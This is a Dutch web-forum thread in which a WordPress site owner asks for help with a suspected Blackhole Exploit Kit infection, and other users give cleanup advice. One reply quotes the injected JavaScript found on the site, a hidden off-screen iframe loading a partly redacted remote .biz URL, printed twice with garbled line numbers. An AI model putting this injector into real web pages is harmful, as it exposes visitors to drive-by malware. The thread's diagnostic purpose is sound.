Blackhole Exploit Kit
Ik heb denk ik last van een Blackhole Exploit Kit op mijn website.
Configuratie:
- WP 3.5.1
- Up2date plugins
- Premium theme *betaald
Ik heb diverse malen de .php bestanden doorzocht op een code die wijst naar een mogelijke oorzaak. Helaas zonder resultaat. Ik krijg zelf (en sommige bezoekers) met diverse antivirus guards zo nu en dan meldingen, van eem mogelijke dreiging.
Sucuri: OK?
web site: *url verwijderd ivm veiligheid*
status: Verified Clean
web trust: Not Blacklisted
*Cached results from a few minutes ago.
Security report (No threats found):
check Blacklisted: No
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No
AVG: NOK?
*url verwijderd ivm veiligheid*
Kan iemand mij hierbij helpen informeren. Heb reeds de SQL en WP installatie eenmaal volledig opnieuw geinstalleerd. Dus waar dit precies ontstaat is mij geheel onduidelijk. Wellich in een file op de ftp dat geen .php is?
Gewijzigd op 24/05/2013 14:21:44 door Bas IJzelendoorn
Heb je alle bestanden gedownload (via ftp) en met een virusscanner gescand?
Controleer eens op bestanden die recentelijk gewijzigd zijn en check je logboeken op rare events (indien je hier toegang tot hebt)...
Toevoeging op 14/03/2013 12:07:58:
Ik zie trouwens in je broncode een raar script staan, het ziet ernaar uit dat je php files zijn aangepast...
Ik kan je wel helpen met alles te checken, stuur me anders even een PM
code verwijderd om exploit te voorkomen
Gewijzigd op 24/05/2013 15:19:03 door Joren de Wit
@Marvin, die 1e line zie ik zelf nergens staan :S ik PM je even!
Code (php)
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://.....biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://......biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730');f.style.left='-10000px';f.style.visibility='hidden';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
document.getElementsByTagName('body')[0].appendChild(f);
}
iframer();
} else {
document.write("<iframe src='http://.....biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://......biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730');f.style.left='-10000px';f.style.visibility='hidden';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
document.getElementsByTagName('body')[0].appendChild(f);
}
Gewijzigd op 24/05/2013 15:16:02 door Joren de Wit
Ik heb echt even hulp nodig nu... heb er diverse malen nu naar gekeken, maar alsnog geeft hij weer meldingen.
http://imgur.com/ucekepZ
Iemand die de broncode in WP kan na kijken voor me?
Voor de zekerheid heb ik 2 urls en gevaarlijke code verwijderd. Gezien hier bij mij me virusscanner en de spyware scanner begonnen te protesteren bij het openen van de pagina (op phphulp). Graag het verzoek even goed opletten met welke code er geplaatst wordt en geen gevaarlijke code hier te plaatsen.[/modedit]
Maar Bas ... is er ook iemand die mij kan helpen?
Alle wachtwoorden aangepast?
En heb je ook de access logs na kunnen kijken?
Eventueel wil ik er wel naar kijken (pm me dan de details) maar dat zal pas volgende week gebeuren.
Dan alles verwijderen, WP nieuw erop zetten (van schone installatie) en dan database terug zetten.
Is misschien de enige manier.
En uiteraard dit aangeven bij WP, zodat ze het gat kunnen dichten.